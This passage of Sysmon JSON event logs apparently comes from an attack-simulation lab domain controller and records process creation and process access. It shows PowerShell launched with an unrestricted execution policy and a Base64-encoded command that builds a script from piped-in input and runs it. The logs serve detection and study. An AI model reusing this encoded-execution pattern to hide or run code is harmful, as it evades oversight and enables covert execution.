JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nParentProcessId: 5060\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.500","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D8-5F25-0000-001071840800}","ParentProcessId":"5060","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nSourceProcessId: 5060\r\nSourceThreadId: 3744\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b4a0c81b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead8f5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead5c6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b495e9db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3e6e15c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ecc62b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eafc90|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eafc90|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eafb21|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ea1aa6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eadfd9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eadbcc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead8f5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead5c6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b495e9db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3e94427|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3e939f7","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001071840800}","SourceProcessId":"5060","SourceThreadId":"3744","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b4a0c81b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead8f5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead5c6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b495e9db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3e6e15c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ecc62b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eafc90|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eafc90|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eafb21|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ea1aa6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eadfd9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3eadbcc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead8f5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3ead5c6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b495e9db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3e94427|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b3e939f7","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 